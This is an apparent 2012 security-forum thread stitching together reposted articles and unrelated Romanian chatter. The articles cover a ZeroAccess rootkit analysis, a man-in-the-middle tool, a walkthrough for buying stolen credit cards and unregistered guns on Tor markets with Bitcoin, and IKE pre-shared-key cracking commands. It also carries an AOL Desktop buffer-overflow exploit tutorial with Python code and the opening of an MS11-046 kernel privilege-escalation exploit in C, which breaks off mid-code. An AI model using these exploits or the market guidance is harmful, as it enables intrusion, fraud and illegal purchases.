Nytro

[h=1]Targeting ZeroAccess Rootkit’s Achilles’ Heel[/h]Monday, April 30, 2012 at 4:17pm by Aditya Kapoor [h=2]Proliferation[/h] ZeroAccess is one of the most talked and blogged [1], [2] about rootkits in recent times. It is also one of the most complex and highly prevalent rootkits we have encountered and which is still continuing to evolve. The ZeroAccess rootkit is distributed via both social engineering as well as exploitation. A recent blog post by our colleagues at McAfee, describes some of the odd methods this rootkit adopts to get installed on machines without getting noticed. One of the goals of this rootkit is to create a powerful peer-to-peer botnet, which is capable of downloading additional malware on the infected system. This botnet is reportedely [3] involved in clickfraud, downloading rogue antivirus applications, and generating spam. This Google map of the United States shows McAfee VirusScan consumer nodes reporting unique ZeroAccess detection over the past week. Our consumer data for the past month shows close to 4,000 unique systems detecting ZeroAccess daily. And the trend is continuing upward. [h=2] Installation[/h] In my recent analysis of this rootkit , I was looking to understand the initial installation mechanism. The installation of ZeroAccess involves overwriting a legitimate driver on disk with the malicious rootkit driver. Usually Step 1 varies in different variants i.e. some variants would directly overwrite a legitimate driver and some others would first inject the malicious code in trusted processes like explorer.exe and then, from the injected code, overwrite the driver (this is done to bypass various security products and to make analysis more challenging). During Step 1, the original driver code is kept in memory. The driver, which is overwritten in Step 2, is randomly selected (details here [1]), in our discussion below we assume CDROM.sys is being overwritten. Step 2 to Step 8 are fairly static in variants of ZeroAccess. Once the driver is overwritten by malicious code it is loaded in kernel space. The first task of the kernel mode code is to ensure that it sets up the malware to survive reboots and to forge the view of overwritten driver (CDROM.sys). Lets move on to see how this scheme works in Step 5 – Step 8. In Step 5, ZeroAccess intercepts disk i/o by hooking DeviceExtension->LowerDeviceObject field in the \driver\disk DEVICE_OBJECT. So now any disk i/o would go through rootkit’s malicious routine. In Step 6, the kernel mode code has the access to clean image of CDROM.sys driver stored in memory and to survive reboots it flushes the file using ZwFlushVirtualMemory API to disk. The request to flush the clean image is interestingly sent to the file CDROM.sys, which at first glance looks counter intuitive. Why would the rootkit want to the write clean image to the file it just infected in Step 2? Looking more closely, the rootkit actually uses its disk i/o redirection framework. So, when this request to store the clean image of file on disk traverses through the virtual driver stack shown in Step 7, it is encrypted and redirected ( Step 8 ) to the rootkits “protected” folder that it created in Step 3, instead of going to the actual CDROM.sys. Once the original encrypted image of CDROM.sys is stored in the protected folder, the infection becomes persistent and can easily survive reboots. Any attempt to read the infected CDROM.sys would have to traverse the hijacked i/o path , where, the rootkit decrypts the original file from its protected storage on the fly and presents the clean image, thus forging the view of the file to security tools. Also during reboot the infected file would first load the malicious code in kernel which can refer to its “protected” folder and load the original file in kernel thus ensuring uninterrupted functionality of the original device. In order to clean this threat, security tools have to take several steps in repairing either memory or decrypting the files its protected folder so that they can restore the original file. Also once the rootkit is active in kernel mode it takes lot of evasive steps to kill or circumvent the security tools as described by our colleages in this Virus Bulletin article. So repair becomes even more challenging and research costly. [h=2]Impact of real time kernel monitoring[/h] I tested many variants spanning over an year of this rootkit family against McAfee’s Deep Defender technology which provides real time protections against unauthorized kernel memory modifications. The following screenshot shows Deep Defender blocking the DeviceExtension hijack attempt in Step 5, which was critical to rootkits survival. Once this hook is blocked the machine was cleaned after a reboot, without any fancy repairs and it actually shaved off days of reverse engineering and writing custom repair against this rootkit and its multiple variants. It seemes as if Deep Defender hit right in the Achilles heel of the rootkit. [h=2]Is that it? How did Deep Defender clean the machine?[/h] No you did not miss part of the article, the interesting part is that Deep Defender did not have to do any custom repairs to clean this threat. It just blocked realtime the core functionality of rootkit. Lets revisit the attack strategy to understand what happened. When the rootkit attempted to hijack the DeviceExtension pointer in Step 5, Deep Defender’s real time kernel memory protection saw the attempted change and recognized it is a malicious attempt to modify a critical structure and blocked the hijack attempt. With the hook gone, the rootkit could not hijack the disk i/o path, which means it cannot store any files in its “protected” folder anymore and could not survive any reboots without getting noticed. It certainly cannot forge the view of the file anymore as well. But the most interesting part is that the attempted hijack block by Deep Defender actually redirected the rootkit’s write attempt in Step 7 to go to its original location. So Step 8 would actually overwrite the original file that it just infected from user mode, thus forcing the rootkit to cleanup for us. After a reboot the system will be back in the clean state. This strategy from Deep Defender works against all the current ZeroAccess variants. It would be challenging for the rootkit authors to fully bypass this defense without either leaving the system in a corrupted state and without being noticed by the security tools which would catch them red handed if they cannot forge the view of the file anymore. Sursa: Targeting ZeroAccess Rootkit’s Achilles’ Heel | Blog Central

[h=1]Subterfuge - Man-in-the-Middle Attack Framework Tutorial[/h]By Irfan Shakeel Subterfuge, a Framework to take the arcane art of Man-in-the-Middle Attack and make it as simple as point and shoot. A beautiful, easy to use interface which produces a more transparent and effective attack is what sets Subterfuge apart from other attack tools. Subterfuge demonstrates vulnerabilities in the ARP Protocol by harvesting credentials that go across the network, and even exploiting machines through race conditions. Subterfuge is a small but devastatingly effective credential-harvesting program which exploits a vulnerability in the Address Resolution Protocol. It does this in a way that a non-technical user would have the ability, at the push of a button, to harvest all of the usernames and passwords of victims on their connected network, thus equipping information and network security professionals with a “push-button” security validation tool. The video below show you how to configure subterfuge on your computer, the operating system shown in the video is backtrack 5 but you can install subterfuge in other Linux distribution because subterfuge install dependencies by itself. So this is a small video in the subterfuge tutorial I will show you how to perform the various attack. Do not forget to comment about this wonderful tool and do not forget to share your experiences regrading the framework. Sursa: Subterfuge - Man-in-the-Middle Attack Framework Tutorial | Ethical Hacking-Your Way To The World Of IT Security

[h=1]How online black markets work[/h] [h=2]Corporate investigator Brandon Gregg looks at how bitcoins and Tor make ********* black markets tick[/h] [h=3]By Brandon Gregg, CPP[/h]April 30, 2012 — CSO — The internet is no stranger to crime. From counterfeit and stolen products, to illegal drugs, stolen identities and weapons, nearly anything can be purchased online with a few clicks of the mouse. The online black market not only can be accessed by anyone with an Internet connection, but the whole process of ordering illicit goods and services is alarmingly easy and *********, with multiple marketplaces to buy or sell anything you want. Understanding how the market thrives—unregulated and untraceable—can give you a better sense of the threats (or resources) that affect you and your business. In our scenario we are going to legally transfer $1,000 USD out of a regular bank account and into a mathematical system of binary codes, and then enter a neighborhood of the Internet largely used by criminals. This hidden world anyone lets purchase bulk downloads of stolen credit cards, as well as a credit card writer, blank cards, some "on stage" fake identities—and maybe even a grenade launcher they've had their eyes on. A journey into the darker side of the Internet starts with two open-source programs: Bitcoin and the Tor Bundle. [h=3]Moving Money[/h] Bitcoin (Bitcoin - P2P digital currency) is system tool that will act as a personal bank for storing and investing digital currency on your computer. Once it's installed on your system, it sits empty like a piggy bank, waiting to be filled with untraceable digital cash. Getting it filled is the tricky part. The digital monetary system online is predominately operated by the likes of Paypal, Western Union, and banking companies that try to follow government regulations to prevent fraud and money laundering. There are two steps to legally take money and have it converted at the current Bitcoin rate into BTCs in our digital and ********* bank. Start by opening a Dwolla (www.dwolla.com) banking account with no fees. You can use your real information—you aren't doing anything illegal. In about three days you will be given a fraud test and have to identify small transfers in your Dwolla and personal bank account. Once your account is confirmed, wire any amount from your personal bank to Dwolla from a lump sum or the estimated price of your purchase you have in mind. After you confirm the transfers, your legit money will now be stored in a new global bank with less restriction than US banks. Next you need to set up an account with the largest bitcoin exchanger, MtGox. Due to fraud concerns, MtGox will only allow transfers from banks like Dwolla. After your Dwolla transfer moves to MtGox, you can use the money to purchase Bitcoins on the open market for a small percentage-based fee. Once this sale is complete, your bitcoins are best stored in your own bank account that is residing digitally on your computer. The whole process can be completed in less than a week, and the $1,000 USD is now exchanged to $191 BTC. Now you are ready to go shopping on the black market. [h=3]Finding Markets[/h] The conversion of dollars to Bitcoins was legal and relatively safe. Actually engaging in black market shopping, though, connects you to various kinds of illegal activities. We'll continue our walkthrough but we are NOT endorsing these activities. This information can help security professionals understand how stolen identities and credit cards are used, how products are fenced or distributed illegally, and more. Clearly anyone engaging in black market activity wants to remain *********. So the next step in black market shopping is to download and open the Tor Bundle Pack (https://www.torproject.org/). We have touched on Tor two or three times to protect your identity while online, but Tor includes other functions. Developed by the US Navy for secret communications and now used to circumvent blocked websites at offices across the country and to inspire Arab Springs, TOR has a darker cousin: Hidden Tor Servers. The same random spider-web routing of Internet traffic that hides an end use's IP and location from any prying eyes can hide server locations too. Hidden Tor Servers are now the norm for storing, accessing and hiding illicit activity such as child pornography. The level of protection provided by Tor makes law enforcement's job tracking such activities next to impossible. (Interestingly, the hacktivist group ********* has recently brought attention to such evil servers by controlling them as DDOS servers against some of their targets, including law enforcement and government groups. If the CIA is struck with a DDOS attack, the agency suffers but also, in investigating the source of the attack, discovers the child pornography and hopefully cracks the pornography ring.) Hidden Tor Servers are likewise home to much black market activity. [Also read Online seller of counterfeit credit cards gets prison time] Where does one find "the black market"? What does it look like? Of course, Google search answers these questions easily. Using your Tor browser (which, yes, is much slower than a standard browser) search for "Tor Directories". These websites offer a collection of Tor's hidden web pages for all kinds of storefronts. Here you will find websites similar to the Yahoo's early days, categorizing storefronts including Drugs, Weapons and other illegal goods and activities. If the directory (or store) is listed with a standard .com or .org domain, it will open in your standard browser; if it ends in .onion then it means it's a hidden server only viewable on the Tor browser. One example is the Nobody@Zerodays website (nobody.zerodays.org/hidden-directory/), which offers reviews and direct links to current Hidden Tor sites. In our scenario we are going to check out the Black Market Reloaded and look for the current price of some credit cards and tools. Using Tor you can quickly jump to the Black Market Reloaded website, register (no real information needed), and start shopping. As on Amazon, sellers show off their products with details, pictures and pricing, including feedback collected from past buyers. On a given day in April, current pricing for bulk credit cards is running at $6.5 BTC with great seller feedback. One seller advertises: "All of our Products are coming with full given Information. That means: All needed information like cardnumber, security code, expiration date, name, address, city, state, zipcode, country, phone, SSN, DOB, security question etc. is given. Also Track 1+2 data and PIN. All CCs are checked and have a minimum Balance of 1000¬/$, and most of them are from an EU-Country. We also have US-Cards, but it's easier to cashout the money at ATMs (/buy virtual money online/link the CC to PayPal) with european ones." A "Credit card reader/writer, HiCo/LoCo, all ISO complete" is going for 76.60350 BTC (or $366.63 USD at the time of our exchange) and there are also a handful of unregistered handguns, including a brand new M9 Tactical handgun with an illegal silencer, unregistered of course, for 225.00000 BTC or $1,076.87 USD. Anyone who executes these purchases via ********* bitcoins will leave no trace of the transaction. All users can send data via Hidden Tor email servers, or ship physical items like drugs and weapons with the US Postal Service to prevent any searches without a warrant. When shipments come from within the US, the illegal goods are likely to arrive at the right mailbox without incident. For those who want an added layer of protection—say in the event that good are being shipped from outside the US—many people in the "Services" section of this site will buy and/or receive items on your behalf using their own bitcoins and addresses, and then remail the goods to you, for a small fee. (Also, some users of these sites will offer to sell you bitcoins via Paypal so you can skip the two banking steps above and jump right into buying your goods; there is of course no guarantee that you will receive your bitcoins after giving up your cash.) [Also read Facebook, SEO and black-hat tactics colliding—still] Tor's Hidden Servers provide a real insight to an underground world that once was limited to dark alleys, shady places, and dangerous criminals. Much like the Internet has expanded our e-commerce into a borderless global market, bitcoins and Tor have made shopping for illicit goods and services almost as easy as ordering an iTunes song on your computer. As a reminder, most of the purchases described here are illegal and/or dangerous. While it's extremely difficult to identify the individuals involved without additional intel, law enforcement personnel and corporate investigators can use these processes to keep tabs on the flow of stolen, counterfeit, or diverted goods. If these transactions are being executed on your corporate network, that activity can expose your organization to legal and other risks. While network logs will not show the Tor websites, software audits for programs like TOR, network sniffing of actual traffic, computer monitoring and computer forensics can show employers who is using TOR sites and what they are doing. Brandon Gregg is a corporate investigations manager. Sursa: How online black markets work - CSO Online - Security and Risk

[h=1]Angajatii lui Zuckerberg se imbogatesc inca de la angajare. Cat castiga un student fara experienta la Facebook[/h] [h=2] Fondatorul Facebook, Mark Zuckerberg, isi rasplateste regeste internii. Mai mult, cei care ajung in practica in compania antreprenorului marturisesc ca reusesc sa stranga intr-un an suficienti bani cat sa-si permita apoi diverse extravagante. [/h] 28 aprilie 2012 06:00 | 659 vizualizari | autor: incont.ro Un salariu mediu pentru un practician care se ocupa de dezvoltarea de software in cadrul Facebook este peste 5.000 de dolari pe luna, potrivit Business Insider. Daca nu luam in calcul impozitele pe care practicantii le platesc catre statul american, onorariul acestora ajung la 60.000 de dolari pe an, destul de multi bani pentru cineva cu putina experienta in programare. Ba mai mult, exista interni si mai norocosi. Conform unor surse citate de Business Insider, unii studenti sau masteranzi ajunsi in practica la reteaua de socializare castiga si 6.800 de dolari pe luna, bani la care se adauga o bursa pentru cheltuielile personale, in valoare de 1.000 de dolari. Media salariala pentru un inginer care se ocupa cu programarea la Facebook este de 6.229 de dolari, scrie si GlassDoor.com. Facebook vrea sa atraga aproximativ 5 miliarde de dolari prin listarea la bursa, pregatind cea mai mare oferta publica initiala efectuata vreodata in industria IT, care i-ar putea asigura o capitalizare de pana la 100 miliarde de dolari. Analistii considera ca investitorii se vor bate pe actiunile Facebook in cadrul ofertei publice initiale, insa semnalele negative privind incetinirea cresterii i-ar putea determina pe unii sa nu devina actionari pe termen lung. Facebook, fondata in 2004 de Mark Zuckerberg, a depasit in primul trimestru pentru prima data pragul de 900 milioane de utilizatori activi lunar. Compania a angajat 1.100 de persoane in ultimele 12 luni, numarul total de angajati ajungand la 3.539, potrivit raportarilor inaintate luni seara Comisiei pentru valori mobiliare din SUA. Cheltuielile s-au dublat in ultimele 12 luni, in timp ce veniturile au urcat cu numai 45%, a precizat compania. Profitul net a scazut astfel cu 12% in primul trimestru, la 205 milioane de dolari, de la 233 milioane de dolari in perioada corespunzatoare a anului trecut. Veniturile au totalizat 1,06 miliarde de dolari, in scadere cu 6% fata de trimestrul al patrulea. Pe langa incetinirea cresterii, Facebook are si probleme legate de drepturile de proprietate intelectuala si brevete. Yahoo a dat in judecata Facebook pentru incalcarea unor brevete, in timp ce reteaua de socializare incearca sa-si consolideze portofoliul de drepturi de proprietate intelectuala pentru a evita viitoare infruntari in instanta. Facebook a anuntat luni ca va plati 550 milioane de dolari catre Microsoft, pentru un portofoliu de cateva sute de brevete. Sursa: Angajatii lui Zuckerberg se imbogatesc inca de la angajare. Cat castiga un student fara experienta la Facebook - www.InCont.ro

[h=3]Aggressive Mode VPN -- IKE-Scan, PSK-Crack, and Cain[/h] Kislay Bhardwaj - 1:50 AM In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a vpn client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump and start dictionary or brute force attack against this hash to recover the PSK. This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already encrypted. Based on such facts IKE aggressive mode is not very secure. It looks like this: $ [COLOR=red]sudo ike-scan 192.168.207.134[/COLOR] Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 192.168.207.134 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797) Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec). 0 returned handshake; 1 returned notify $ [COLOR=red]sudo ike-scan -A 192.168.207.134[/COLOR] Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ikescan/) 192.168.207.134 Aggressive Mode Handshake returned HDR=(CKY-R=f320d6XXXXXXXX) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity) VID=afcad71368a1XXXXXXXXXXXXXXX(Dead Peer Detection v1.0) VID=06e7719XXXXXXXXXXXXXXXXXXXXXX VID=090026XXXXXXXXXX (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.168.207.134) Nonce(20 bytes) Hash(16 bytes) To save with some output: $ [COLOR=red]sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key[/COLOR] Once you have you psk file to crack you're stuck with two options psk-crack and cain psk-crack is fairly rudamentary to brute force: $[COLOR=red] psk-crack -b 5 192-168-207-134key[/COLOR] Running in brute-force cracking mode Brute force with 36 chars up to length 5 will take up to 60466176 iterations no match found for MD5 hash 5c178d[SNIP] Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec) Default is charset is "0123456789abcdefghijklmnopqrstuvwxyz" can be changed with --charset= $[COLOR=red] psk-crack -b 5 --[/COLOR]charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key Running in brute-force cracking modde Brute force with 63 chars up to length 5 will take up to 992436543 iterations To dictionary attack: $ [COLOR=red]psk-crack -d /path/to/dictionary 192-168-207-134key[/COLOR] Running in dictionary cracking mode no match found for MD5 hash 5c178d[SNIP] Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec) You may find yourself wanting a bit more flexibility or options during bruteforcing or dictionary attacking (i.e. character substition). For this you'll need to use Cain. The problem I ran in to was Cain is a Windows tool and ike-scan is *nix. I couldnt get the windows tool that is floating around to work. Solution...run in vmware and have Cain sniff on your VMware interface. The PSK should show up in passwords of the sniffer tab, then you can select and "send to cracker". Its slow as hell, but more options than psk-crack. Sursa: Kislay Bhardwaj: Aggressive Mode VPN -- IKE-Scan, PSK-Crack, and Cain

[h=3]Exploit writing: A basic Idea.[/h] Kislay Bhardwaj - 1:59 PM Exploit Writing Made Easier With !pvefindaddr A few notes before we begin, covering what this paper is about and what it isn’t about: 1. This paper is intended to demonstrate the efficiency of !pvefindaddr. 2. This paper will not explain the exploit till the end, if you want the full exploit go here: http:// AOL Desktop 9.6 .rtx Buffer Overflow Now let’s start! Required software: Immunity Debugger !pvefindaddr AOL Desktop v9.6 Required knowledge: Understanding how buffer overflows work. Exploiting techniques. A programming language (I use python). I’ve heard a lot of people complaining about how many apps they must use when writing exploits, or how time consuming some tasks can be if they are not automated or when trying to test multiple dll’s for SAFESEH or ASLR, that’s where !pvefindaddr comes in. What is !pvefindaddr !? Well in short terms !pvefindaddr is a PyCommand for Immunity Debugger made by corelanc0d3r which can do almost everything (if not everything) that you would need when building an exploit. Here is some helpful information on how to install !pvefindaddr and some basic usage Ok, let us get started ! Install AOL Desktop v9.6 (A quick note here, if the app doesn’t work properly in Immunity Debugger you will have to close the debugger, issue CTRL+ALT+DELETE -> Processes and stop all AOL related processes then run the app). Now let’s make the exploit skeleton (I won’t remake the full exploit, if you want to check it out it’s on the top of the page), it will contain two standard headers and between them our buffer, let’s check it out: **************************************** #!/usr/bin/python # The First Header hd1 = ("\x3c\x48\x54\x4d\x4c\x3e\x3c\x46\x4f\x4e\x54\x20\x20\x53\x49\x5a" "\x45\x3d\x32\x20\x50\x54\x53\x49\x5a\x45\x3d\x31\x30\x20\x46\x41" "\x4d\x49\x4c\x59\x3d\x22\x53\x41\x4e\x53\x53\x45\x52\x49\x46\x22" "\x20\x46\x41\x43\x45\x3d\x22\x41\x72\x69\x61\x6c\x22\x20\x4c\x41" "\x4e\x47\x3d\x22\x30\x22\x3e\x3c\x41\x20\x48\x52\x45\x46\x3d\x22" "\x68\x74\x74\x70\x3a\x2f\x2f") # The Second Header hd2 = ("\x22\x3e\x74\x65\x73\x74\x3c\x2f\x41\x3e\x3c\x55\x3e\x3c\x42\x52" "\x3e\x0d\x0a\x3c\x2f\x55\x3e\x3c\x2f\x46\x4f\x4e\x54\x3e\x3c\x2f" "\x48\x54\x4d\x4c\x3e\x0d\x0a") payload='\x90'* 6000 exploit = hd1+payload+hd2 try: file=open('exploit.rtx','w') file.write(exploit) file.close() print 'File created, time to PEW PEW!\n' except: print 'Something went wrong!\n' print 'Check if you have permisions to write in that folder, of if the folder exists!' **************************************** Generate the file using the exploit and after that open it in AOL Desktop and as we can see we could overwrite EIP with our ‘\x90’’s: So what would be next ? Calculating the exact offset until EIP overwrite. (NOTE: Before we go on, restart AOL and attach it again). In our debugger we can either click on the PyCommands button and select from the list ! pvefindadrr and then enter the arguments or we can do this directly by entering !pvefindaddr and the arguments in the command bar at the bottom of the debugger like this: As you can see it said “check mspattern.txt” so we go in the Immunity Debugger folder and open up mspatters.txt, copy the pattern in our exploit and regenerate the malicious file. After opening the malicious file containing our pattern: We can see that our EIP is 35784734 and we also can see that ESI points in our buffer, now in order to determine the exact offset we will use another feature from !pvefindaddr. Normally with metasploit we would try pattern_offset EIP now, well with !pvefindaddr we can actually get more info, let’s try the findmsp function. After it is done just open the Log Windows and as we can see, we have some nice information: So it found the first characters from the patters in davclnt.dll then it checked register addresses, we have the EIP overwite address beginning at 5384 and the register who points in to the pattern with the instruction CALL DWORD[ESI+10] (if you check) at 5368 it even checked the SEH chains to see if it finds the pattern there and we also have the “Walking stack” which if you haven’t guessed by now it actually tells us when the ESP contains a pointer to our buffer at the position 4360. This is a nice feature but we have one that does even better, !pvefindaddr also has a function that runs a findmsp and after that based on the results and on the stack it acutally gives us information about the type of exploit and how it should be made, let’s check it out. !pvefindaddr suggest Sweet huh ? Now we have the exact offset before the EIP overwrite, we know that ESI points to our buffer the next normal step would be to get the value of ESI into EIP with a JMP ESI, CALL ESI, etc. now these are simple instructions we can find them but what if we want to find these instructions without null bytes, from specific modules, etc. (NOTE: I’m not saying this can’t be done manual, only saying that it will take more time and this way it’s much easier). Let’s say we want to make this exploit using an universal address (like the original exploit), searching for this instruction can take a lot of time, mostly because it’s a very common instruction, but using !pvefindaddr we can actually search for every JMP ESI instruction from some specific modules and some specific chatacteristics. We will use !pvefindaddr to give us a list of all modules and their characteristics, once we have done this we can view all the modules that the app uses and see which have SAFESEH, ASLR, etc.: Once we can see which modules we can use we can start searching for the specific instruction using the command: !pvefindaddr j -r ESI -n -o (this might take some time, go get a beer or something.) This function searches for pointers that jump to a specific register (ESI in our case), the most common use of this function is when dealing with direct EIP overwrite. The function will look for any instructions like JMP ESI, CALL ESI combination from non-fixup and non-aslr modules also the -n flag will not show pointers that contain null bytes and the -o flag will exclude the pointers in the OS modules (We want to make it universal). After a little search we find a nice intruction at 20C5CFC0 from aolusershell.dll, this one should work perfect. After we are done we can also use compare to check in order to compare some bytes (usually our shellcode) from a file with some bytes in memory it also compares unicode expanded instances, ok now we need to make our shellcode binary (only the shellcode), we can just give the RAW output at Metasploit when making a payload and pipe it to a file like: msfpayload windows/exec CMD=calc.exe R > shellcode There is also a nice perl script that shows you how to do it on the !pvefindaddr wiki: **************************************** my $shellcode="\xcc\xcc\xcc\xcc"; #paste your shellcode here open(FILE,">c:\\temp\\shellcode.bin"); binmode FILE; print FILE $shellcode; close(FILE); **************************************** We then run the whole exploit (with the shellcode included, without any breakpoints or anything), now that the app has crashed we compare it: !pve finder compare C:\shellcode After it is finished we can either view the Log Windows or open compare.txt from the Immunity Debugger folder: Now a quick review on what we managed to do in this tutorial: - We have determined the exact offset before EIP gets overwritten and also a register that points to our buffer. - We have found our type of exploit, and some information on how to structure it - Found out which modules have SAFESEH, ASLR or get rebased - Found the instruction we needed avoiding these modules and the OS modules aswell - Checked if our shellcode contains bad characters. So as you can see we did all the above with just !pvefindaddr and we also managed to save a good amount of time. Sursa: Kislay Bhardwaj: Exploit writing: A basic Idea.

Da, frumos...

Informatica @ Universitate: Anul I, semestrul I: - Programare procedurala (limbajul C) - Logica matematica (pula Boole, porcarie) - Algebra (cacat) - Analiza (cacat si mai mare) - Algoritmi si structuri de date (sortari, arbori, util) - Arhitectura calculatorului (cum arata un procesor, interesant, laborator de ASM, util) Anul I, semestrul II: - Programare orientata pe obiecte (C++, important) - Analiza II (cacat) - Algebra II (cacat) - Algoritmica grafurilor (prea teoretic, naspa) - Geometrie (tot cacat) - Limbaje formale si automate (nu prea stiu despre ce e vorba) Anul II, semestrul I: - tehnici web: HTML, CSS si Javascript (practic) - geometrie computationala (cam teoretic, cred) - calculabilitate si complexitate (optimizari, util) - tehnici avansate de programare (java, foarte util) - sisteme de operare (Linux, C++ sub Linux, super tare) - probabilitati (nu stiu exact, cred ca mate, deci naspa) Anul II, semestrul II: - statistica (profa buna, porcarie in rest) - retele de calculatoare (Java sockets, RMI si serializare, util) - metode de dezvoltare software (porcarie la care trebuie orice proiect) - inteligenta artificiala (nu stiu exact, laborator de Prolog) - programare logica (prof naspa, laborator de Maude, un limbaj ciudatel dar interesant) - baze de date (teorie la curs, laborator de Oracle) Cam atat deocamdata, daca vreti alte informatii, cereti.

begood: E ok asa? Acela e ID-ul? Nemessis: Noi avem acces la baza de date, nu cred ca o sa fie probleme. Oricum, majoritatea ne cunoastem intre noi. Sau hai in cacat sa facem si noi un meeting...

SecureCRT.

Scuze, acces: - 3871 = Nytro - 989 = Zatarra - 21017 = pyth0n3 - 13607 = begood - 15061 = MrRip - 1 = []kw3rln - 528 = Nemessis - 1348 = Ahead - 22232 = wildchild - 22968 = tex De asemenea, nu se pot vedea (asa ar trebui) mesajele private ale celor cu acces. Daca mai doreste cineva acces, sa ma contacteze. Daca e vreo problema, sau daca vreti ceva in plus, spuneti.

[h=1]MS11-046 Afd.sys Proof of Concept[/h] /* MS11-046 Was a Zero day found in the wild , reported to MS by Steven Adair from the Shadowserver Foundation and Chris S . Ronnie Johndas wrote the writeup dissecting a malware with this exploit . I Rahul Sasi(fb1h2s) just made the POC exploit available . Reference: ms8-66, ms6-49 ************************************************************* Too lazy to add the shellcode , you could steel this one, it should work . http://www.whitecell.org/list.php?id=50 The shell code to acheive privilage esclation as per the article used the following steps http://www.exploit-db.com/wp-content/themes/exploit/docs/18712.pdf . 1) Use PslookupProcessId get system token 2) Replace it with the current process token, and we are system ************************************************************* */ #define SystemModuleInformation 11 #ifndef WIN32_LEAN_AND_MEAN #define WIN32_LEAN_AND_MEAN #endif #ifndef _WIN32_WINNT //For XP Only #define _WIN32_WINNT 0x0501 #endif // We have a client sock conencting to 135 considering the fact it's open by default #define DEFAULT_ADDR "127.0.0.1" #define DEFAULT_PORT "135" #include <windows.h> #include <winsock2.h> #include <ws2tcpip.h> #include <stdio.h> #include <iphlpapi.h> #include <stdio.h> #pragma comment(lib, "Ws2_32.lib") #pragma comment (lib, "ntdll.lib") //lets make a nop ret sandwitch unsigned char hexcode[]="\x90\x90\x90\xcc\x90\x90\x90\x90"; /* The shell code to acheive privilage esclation Add you shellcode here as per the article http://www.exploit-db.com/wp-content/themes/exploit/docs/18712.pdf the malware used the following method. 1) Wse PslookupProcessId get system token 2) Replace it with the current process token, and we are system */ // he gets the above sandwitch LPVOID hexcode_addr = (LPVOID)0x00000000; DWORD sizeofshell = 0x1000; // he gets the haldispatch ULONG_PTR HalDispatchTable; //Holds the base adress of krnl PVOID krl_base; //load adress of those %krnl%.exe dudes HMODULE krl_addr; // structure system_module_info data typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Reserved[2]; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT Unknown; USHORT LoadCount; USHORT ModuleNameOffset; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; //sock addrinfo struct addrinfo *result = NULL, *ptr = NULL, hints; // The list of loaded drivers typedef LONG NTSTATUS, *PNTSTATUS; NTSTATUS NTAPI ZwQuerySystemInformation( IN ULONG SystemInformationClass, IN PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength); typedef enum _KPROFILE_SOURCE { ProfileTime, ProfileAlignmentFixup, ProfileTotalIssues, ProfilePipelineDry, ProfileLoadInstructions, ProfilePipelineFrozen, ProfileBranchInstructions, ProfileTotalNonissues, ProfileDcacheMisses, ProfileIcacheMisses, ProfileCacheMisses, ProfileBranchMispredictions, ProfileStoreInstructions, ProfileFpInstructions, ProfileIntegerInstructions, Profile2Issue, Profile3Issue, Profile4Issue, ProfileSpecialInstructions, ProfileTotalCycles, ProfileIcacheIssues, ProfileDcacheAccesses, ProfileMemoryBarrierCycles, ProfileLoadLinkedIssues, ProfileMaximum } KPROFILE_SOURCE, *PKPROFILE_SOURCE; typedef DWORD (WINAPI *PNTQUERYINTERVAL)( KPROFILE_SOURCE ProfileSource,PULONG Interval ); typedef NTSTATUS (WINAPI *PNTALLOCATE)( IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN ULONG ZeroBits, IN OUT PULONG RegionSize, IN ULONG AllocationType, IN ULONG Protect ); int main() { //All the declarations goes here PNTQUERYINTERVAL ZwQueryIntervalProfile; PNTALLOCATE ZwAllocateVirtualMemory; KPROFILE_SOURCE stProfile = ProfileTotalIssues; ULONG Ret_size; NTSTATUS status,alloc_status ; ULONG i, n, *q; PSYSTEM_MODULE_INFORMATION p; void *base; WSADATA wsaData; SOCKET ConnectSocket = INVALID_SOCKET; int iResult; DWORD ibuf [0x30]; DWORD obuf [0x30]; ULONG_PTR result; hints.ai_family = AF_UNSPEC; hints.ai_socktype = SOCK_STREAM; hints.ai_protocol = IPPROTO_TCP; printf("\n [+] MS11-046 Exploit by fb1h2s(Rahul Sasi) "); /* MS11-046 Was a Zero day found in the wild , reported to MS by Steven Adair from the Shadowserver Foundation and Chris S . Ronnie Johndas wrote the writeup dissecting a malware with the exploit details . I Rahul Sasi(fb1h2s) just made the POC exploit available . Reference: ms8_66, ms6_49 http://www.whitecell.org/list.php?id=50 exp codes */ status = ZwQuerySystemInformation(SystemModuleInformation, &n, 0, &n); q = (ULONG *)malloc(n * sizeof(*q)); if (q == NULL) { perror("malloc"); return -1; } status = ZwQuerySystemInformation(SystemModuleInformation, q, n * sizeof(*q), NULL); p = (PSYSTEM_MODULE_INFORMATION)(q + 1); base = NULL; // Loop Loop The table and check for our krl for (i = 0; i < *q; i++) { if( strstr(p[i].ImageName,"ntkrnlpa.exe") ) { printf("\n [+] Yo Yo found, and am In ntkrnlpa.exe \n"); krl_addr = LoadLibraryExA("ntkrnlpa.exe",0,1); printf("\t Base: 0x%x size: %u\t%s\n", p[i].Base, p[i].Size, p[i].ImageName); krl_base = p[i].Base; break; } else if(strstr(p[i].ImageName,"ntoskrnl.exe")) { printf("\n [+] Yo Yo found, and am In ntoskrnl.exe\n"); krl_addr = LoadLibraryExA("ntoskrnl.exe",0,1); printf("\t Base 